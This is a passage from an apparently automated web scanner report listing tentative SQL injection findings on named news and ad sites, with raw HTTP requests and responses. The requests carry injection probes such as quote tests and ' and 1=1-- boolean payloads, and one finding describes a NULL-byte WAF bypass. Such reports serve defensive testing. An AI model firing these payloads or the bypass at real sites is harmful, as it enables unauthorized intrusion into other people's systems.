GET /APM/iview/289800145/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 251
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 14 Feb 2011 20:07:47 GMT
Connection: close

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/198621840.198732006.201234719.202422118/289800145/direct" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.a
...[SNIP]...

1.17. http://redcated/APM/iview/289800145/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/289800145/direct

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /APM/iview/289800145/direct?1%00'=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6545
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 14 Feb 2011 20:07:35 GMT
Connection: close

<html><head><title>FY11_Win7_CoolNewProds_Ent_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/289800145/direct?1%00''=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 252
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 14 Feb 2011 20:07:36 GMT
Connection: close

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/198621840.198732006.201234719.202422118/289800145/direct" onclick="(new Image).src='http://t.redcated'"><img src="http://spe.
...[SNIP]...

1.18. http://web.blogads.com/adspotsfolder/get_adspots_data [persistent_uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.blogads.com
Path:   /adspotsfolder/get_adspots_data

Issue detail

The persistent_uid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the persistent_uid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adspotsfolder/get_adspots_data?persistent_uid=db79795307d2e9926c99635c5c60eec3' HTTP/1.1
Host: web.blogads.com
Proxy-Connection: keep-alive
Referer: http://web.blogads.com/adspotsfolder/ba_adspotsfolder_revision_create_shortcut?persistent_uid=db79795307d2e9926c99635c5c60eec3&persistent_ref=
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BALANCEID=balancer.web70; __utma=223130909.1189826010.1297714069.1297714069.1297714069.1; __utmb=223130909; __utmc=223130909; __utmz=223130909.1297714069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 14 Feb 2011 20:07:36 GMT
Server: Zope/(Zope 2.8.9.1-final, python 2.3.5, linux2) ZServer/1.1 Plone/2.0.4
Content-Language:
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.web70; path=/; domain=.web.blogads.com; expires=Mon, 14-Feb-2011 20:27:35 GMT
Connection: close
Content-Length: 14780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en">

...[SNIP]...

Request 2

GET /adspotsfolder/get_adspots_data?persistent_uid=db79795307d2e9926c99635c5c60eec3'' HTTP/1.1
Host: web.blogads.com
Proxy-Connection: keep-alive
Referer: http://web.blogads.com/adspotsfolder/ba_adspotsfolder_revision_create_shortcut?persistent_uid=db79795307d2e9926c99635c5c60eec3&persistent_ref=
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BALANCEID=balancer.web70; __utma=223130909.1189826010.1297714069.1297714069.1297714069.1; __utmb=223130909; __utmc=223130909; __utmz=223130909.1297714069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 20:07:36 GMT
Server: Zope/(Zope 2.8.9.1-final, python 2.3.5, linux2) ZServer/1.1 Plone/2.0.4
Content-Length: 0
Content-Type: text/plain
Set-Cookie: BALANCEID=balancer.web70; path=/; domain=.web.blogads.com; expires=Mon, 14-Feb-2011 20:27:36 GMT
Connection: close


1.19. http://www.france24.com/en/all-wire [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.france24.com
Path:   /en/all-wire

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/all-wire?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.france24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 14 Feb 2011 20:10:06 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: must-revalidate, max-age=2368, post-check=0, pre-check=0
Expires: Mon, 14 Feb 2011 20:49:36 GMT
Date: Mon, 14 Feb 2011 20:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<!-- turquoisine -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<link rel="search" type="application/opensearchdescription+xml" href="http://www.france24.com/en/opensearch.xml" title="France24 (EN)" />
<link rel="shortcut icon" href="/en/sites/france24.com.en/themes/france24/favicon.ico" type="image/x-icon" />
<link type="text/css" rel="stylesheet" media="all" href="/en/files/css/css_76a6cc19b05969a0177d8692996f2a50.css" />
<link type="text/css" rel="stylesheet" media="print" href="/en/files/css/css_99377a7f13373890ca699ee211b47416.css" />
<!--[if IE]>
<link type="text/css" rel="stylesheet" media="all" href="/en/sites/all/themes/zen/zen/ie.css?5" />
<![endif]-->
<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/en/sites/france24.com.en/themes/france24/css/ie6.css?5" />
<![endif]-->
<script type="text/javascript" src="/en/files/js/js_a28d982a7759b6fb288df0b16944ef69.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "basePath": "/en/", "fivestar": { "titleUser": "Your rating: ", "titleAverage": "Average: ", "feedbackSavingVote": "Saving your vote...", "feedbackVoteSaved": "Your vote has been saved.", "feedbackDeletingVote": "Deleting your vote...", "feedbackVoteDeleted": "Your vote has been deleted." }, "lightbox2": { "rtl": 0, "file_path": "/en/(\\w\\w/)files", "default_image": "/en/sites/all/modules/contrib-modif/lightbox2/images/brokenimage.jpg", "border_size": "10", "font_color": "000", "box_color": "fff", "top_position": "", "overlay_opacity": "0.8", "overlay_color": "000", "disable_close_click": 1, "resize_sequence": "0", "resize_speed": 400, "fade_in_speed": 400, "slide_down_speed": 600, "use_alt_layout": 1, "disable_resize": 1, "disable_zoom": 0, "force_show_nav": 0, "loop_items": 0, "node_link_text": "View Image Details", "node_link_target": 0, "image_count": "", "video_count": "Video !current of !total", "page_count": "Page !current of !total", "lite_pr
...[SNIP]...

Request 2

GET /en/all-wire?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.france24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 14 Feb 2011 20:10:10 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: must-revalidate, max-age=2358, post-check=0, pre-check=0
Expires: Mon, 14 Feb 2011 20:49:30 GMT
Date: Mon, 14 Feb 2011 20:10:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<!-- kakapo -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<link rel="search" type="application/opensearchdescription+xml" href="http://www.france24.com/en/opensearch.xml" title="France24 (EN)" />
<link rel="shortcut icon" href="/en/sites/france24.com.en/themes/france24/favicon.ico" type="image/x-icon" />
<link type="text/css" rel="stylesheet" media="all" href="/en/files/css/css_76a6cc19b05969a0177d8692996f2a50.css" />
<link type="text/css" rel="stylesheet" media="print" href="/en/files/css/css_99377a7f13373890ca699ee211b47416.css" />
<!--[if IE]>
<link type="text/css" rel="stylesheet" media="all" href="/en/sites/all/themes/zen/zen/ie.css?5" />
<![endif]-->
<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/en/sites/france24.com.en/themes/france24/css/ie6.css?5" />
<![endif]-->
<script type="text/javascript" src="/en/files/js/js_a28d982a7759b6fb288df0b16944ef69.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "basePath": "/en/", "fivestar": { "titleUser": "Your rating: ", "titleAverage": "Average: ", "feedbackSavingVote": "Saving your vote...", "feedbackVoteSaved": "Your vote has been saved.", "feedbackDeletingVote": "Deleting your vote...", "feedbackVoteDeleted": "Your vote has been deleted." }, "lightbox2": { "rtl": 0, "file_path": "/en/(\\w\\w/)files", "default_image": "/en/sites/all/modules/contrib-modif/lightbox2/images/brokenimage.jpg", "border_size": "10", "font_color": "000", "box_color": "fff", "top_position": "", "overlay_opacity": "0.8", "overlay_color": "000", "disable_close_click": 1, "resize_sequence": "0", "resize_speed": 400, "fade_in_speed": 400, "slide_down_speed": 600, "use_alt_layout": 1, "disable_resize": 1, "disable_zoom": 0, "force_show_nav": 0, "loop_items": 0, "node_link_text": "View Image Details", "node_link_target": 0, "image_count": "", "video_count": "Video !current of !total", "page_count": "Page !current of !total", "lite_press_x
...[SNIP]...

1.20. http://www.ians.in/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ians.in
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14508982%20or%201%3d1--%20 and 14508982%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?114508982%20or%201%3d1--%20=1 HTTP/1.1
Host: www.ians.in
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 14 Feb 2011 20:09:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding
Content-Length: 496
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.ians.in Port 80</address>
</body></html>

Request 2

GET /?114508982%20or%201%3d2--%20=1 HTTP/1.1
Host: www.ians.in
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 20:09:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding
Content-Length: 493
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /0 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.ians.in Port 80</address>
</body></html>

1.21. http://www.nbcmiami.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nbcmiami.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10092696%20or%201%3d1--%20 and 10092696%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?110092696%20or%201%3d1--%20=1 HTTP/1.1
Host: www.nbcmiami.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html?dr&1%20and%201%3d1--%20=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T|Q_2168|Q_2167|Q_2004|Q_1999|Q_1997|Q_1996|Q_1991|Q_1962|Q_1956|Q_1955|Q_1917|Q_1914|Q_1557|Q_387|Q_386|Q_385|Q_384|Q_383|Q_382|Q_334|Q_326|Q_325|Q_320|Q_316; snas_noinfo=1; s_cc=true; __qca=P0-655398647-1297714683470; mmsegs=AA%3D5%3BAD%3D1%3BAF%3D1%3BAG%3D1%3BAI%3D1%3BAL%3D5%3BAM%3D5%3BAR%3D1%3BAS%3D1%3BAU%3D1; _chartbeat2=lwxz603ji4q384z2; s_nr=1297714704177; s_sq=nbcuglobal%2Cnbculimdivisionprod%2Cnbculimmiamiprod%3D%2526pid%253DExplosion%252520Blows%252520Lid%252520Off%252520Broward%252520Grow%252520House%2526pidt%253D1%2526oid%253Dhttp%25253A//www.nbcmiami.com/%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b3
Content-Type: text/html;charset=utf-8
Date: Mon, 14 Feb 2011 20:24:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Tue, 15-Feb-2011 02:24:47 GMT; path=/
Vary: User-Agent
Content-Length: 152001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraph.o
...[SNIP]...
n: "http://media.nbcmiami.com", submissionType: "", momentCategory: "", debug: false, roadblockOrdNumber: 73954232,
defaultLat: "25.78", defaultLong: "-80.21", gmapKey: "ABQIAAAAqVLuG7bZfizR7HmRA5SLvRQugu4gdpSZOxJFlwts4RwSscqdyBSfI5FAWeznvqELjdqRqTblT3QkdA", fbApiKey: "7f779fdbd67c391510ced3838d966baf" };

</script>



<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="imagetoolbar" content="false" />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="google-site-verification" content="J_TExBQP8zWCS59RsGcM6VSRGvK0WA0HSmT5E7ZDWSs" />


<title>

NBC Miami - Local News, Weather, Traffic, Entertainment, Events, Breaking News |
NBC Miami
</title>

<meta name="description" content="Miami local news, national news and Miami breaking news stories. Get the latest about Miami business, Miami sports, Miami traffic, Miami weather, Miami health news and Miami events on NBC Miami." />

<meta name="keywords" content="Miami local news, Miami channel 6, NBC Miami online, WTVJ online, NBC Miami traffic watch, NBC Miami updates, Miami fl, florida" />

<meta name="google-site-verification" content="jxQVwrQmEfiKd7whbLJ3FJP4JW5pIHaAOJsJ4sybdwc" />
<meta name="google-site-verification" content="OeNSrdLfWWnlaibaNFYamtKZrnKlLKEbDHqN8MZ8LnA" />




<link rel="alternate" type="application/rss+xml" title="Miami News, Sports, Weather, and Traffic" href="http://feeds.nbcmiami.com/nbcmiami/news/top-stories/" />






<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc.css?r=2011-01-11" type="text/css" />











<script src="http://www.nbcmiami.com/includes/utils.js?r=2011-02-03" language="javascript" type="text/javascript"></script>



<script src="http://www.nbcm
...[SNIP]...

Request 2

GET /?110092696%20or%201%3d2--%20=1 HTTP/1.1
Host: www.nbcmiami.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html?dr&1%20and%201%3d1--%20=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T|Q_2168|Q_2167|Q_2004|Q_1999|Q_1997|Q_1996|Q_1991|Q_1962|Q_1956|Q_1955|Q_1917|Q_1914|Q_1557|Q_387|Q_386|Q_385|Q_384|Q_383|Q_382|Q_334|Q_326|Q_325|Q_320|Q_316; snas_noinfo=1; s_cc=true; __qca=P0-655398647-1297714683470; mmsegs=AA%3D5%3BAD%3D1%3BAF%3D1%3BAG%3D1%3BAI%3D1%3BAL%3D5%3BAM%3D5%3BAR%3D1%3BAS%3D1%3BAU%3D1; _chartbeat2=lwxz603ji4q384z2; s_nr=1297714704177; s_sq=nbcuglobal%2Cnbculimdivisionprod%2Cnbculimmiamiprod%3D%2526pid%253DExplosion%252520Blows%252520Lid%252520Off%252520Broward%252520Grow%252520House%2526pidt%253D1%2526oid%253Dhttp%25253A//www.nbcmiami.com/%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u14-b2
Content-Type: text/html;charset=utf-8
Date: Mon, 14 Feb 2011 20:24:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Tue, 15-Feb-2011 02:24:48 GMT; path=/
Vary: User-Agent
Content-Length: 151891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraph.o
...[SNIP]...
n: "http://media.nbcmiami.com", submissionType: "", momentCategory: "", debug: false, roadblockOrdNumber: 969442679,
defaultLat: "25.78", defaultLong: "-80.21", gmapKey: "ABQIAAAAqVLuG7bZfizR7HmRA5SLvRQugu4gdpSZOxJFlwts4RwSscqdyBSfI5FAWeznvqELjdqRqTblT3QkdA", fbApiKey: "7f779fdbd67c391510ced3838d966baf" };

</script>



<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="imagetoolbar" content="false" />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="google-site-verification" content="J_TExBQP8zWCS59RsGcM6VSRGvK0WA0HSmT5E7ZDWSs" />


<title>

NBC Miami - Local News, Weather, Traffic, Entertainment, Events, Breaking News |
NBC Miami
</title>

<meta name="description" content="Miami local news, national news and Miami breaking news stories. Get the latest about Miami business, Miami sports, Miami traffic, Miami weather, Miami health news and Miami events on NBC Miami." />

<meta name="keywords" content="Miami local news, Miami channel 6, NBC Miami online, WTVJ online, NBC Miami traffic watch, NBC Miami updates, Miami fl, florida" />

<meta name="google-site-verification" content="jxQVwrQmEfiKd7whbLJ3FJP4JW5pIHaAOJsJ4sybdwc" />
<meta name="google-site-verification" content="OeNSrdLfWWnlaibaNFYamtKZrnKlLKEbDHqN8MZ8LnA" />




<link rel="alternate" type="application/rss+xml" title="Miami News, Sports, Weather, and Traffic" href="http://feeds.nbcmiami.com/nbcmiami/news/top-stories/" />






<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc.css?r=2011-01-11" type="text/css" />











<script src="http://www.nbcmiami.com/includes/utils.js?r=2011-02-03" language="javascript" type="text/javascript"></script>



<script src="http://www.nbc
...[SNIP]...

1.22. http://www.nbcmiami.com/news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nbcmiami.com
Path:   /news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html?dr&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.nbcmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u38-b4
Content-Type: text/html;charset=utf-8
Date: Mon, 14 Feb 2011 20:16:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 253024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraph.org/s
...[SNIP]...
n: "http://media.nbcmiami.com", submissionType: "", momentCategory: "", debug: false, roadblockOrdNumber: 912323195,
defaultLat: "25.78", defaultLong: "-80.21", gmapKey: "ABQIAAAAqVLuG7bZfizR7HmRA5SLvRQugu4gdpSZOxJFlwts4RwSscqdyBSfI5FAWeznvqELjdqRqTblT3QkdA", fbApiKey: "7f779fdbd67c391510ced3838d966baf" };

</script>



<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="imagetoolbar" content="false" />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="google-site-verification" content="J_TExBQP8zWCS59RsGcM6VSRGvK0WA0HSmT5E7ZDWSs" />




















<title>




Explosion Blows Lid Off Broward Grow House |
NBC Miami
</title>

<meta name="description" content="Cops find marijuana plants after blast blows roof off home." />

<meta name="title" content="Explosion Blows Lid Off Broward Grow House" />
<link rel="image_src" href="http://media.nbcmiami.com/images/100*75/021411+grow+house+explosion.jpg" />





<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc.css?r=2011-01-11" type="text/css" />






<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc_story.css?r=2011-02-03" type="text/css" />



<link rel="stylesheet" href="http://www.nbcmiami.com/templates/jqmodal2.css?r=2011-02-03" type="text/css" />








<script src="http://www.nbcmiami.com/includes/utils.js?r=2011-02-03" language="javascript" type="text/javascript"></script>



<script src="http://www.nbcmiami.com/includes/nbc_jquery.js" language="javascript" type="text/javascript"></script>



<script src="http://www.nbcmiami
...[SNIP]...

Request 2

GET /news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html?dr&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.nbcmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u38-b4
Content-Type: text/html;charset=utf-8
Date: Mon, 14 Feb 2011 20:16:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 253014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraph.org/s
...[SNIP]...
n: "http://media.nbcmiami.com", submissionType: "", momentCategory: "", debug: false, roadblockOrdNumber: 779775019,
defaultLat: "25.78", defaultLong: "-80.21", gmapKey: "ABQIAAAAqVLuG7bZfizR7HmRA5SLvRQugu4gdpSZOxJFlwts4RwSscqdyBSfI5FAWeznvqELjdqRqTblT3QkdA", fbApiKey: "7f779fdbd67c391510ced3838d966baf" };

</script>



<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="imagetoolbar" content="false" />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="google-site-verification" content="J_TExBQP8zWCS59RsGcM6VSRGvK0WA0HSmT5E7ZDWSs" />




















<title>




Explosion Blows Lid Off Broward Grow House |
NBC Miami
</title>

<meta name="description" content="Cops find marijuana plants after blast blows roof off home." />

<meta name="title" content="Explosion Blows Lid Off Broward Grow House" />
<link rel="image_src" href="http://media.nbcmiami.com/images/100*75/021411+grow+house+explosion.jpg" />





<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc.css?r=2011-01-11" type="text/css" />






<link rel="stylesheet" href="http://www.nbcmiami.com/templates/nbc_story.css?r=2011-02-03" type="text/css" />



<link rel="stylesheet" href="http://www.nbcmiami.com/templates/jqmodal2.css?r=2011-02-03" type="text/css" />








<script src="http://www.nbcmiami.com/includes/utils.js?r=2011-02-03" language="javascript" type="text/javascript"></script>



<script src="http://www.nbcmiami.com/includes/nbc_jquery.js" language="javascript" type="text/javascript"></script>



<script src="http://www.nbcmiami
...[SNIP]...

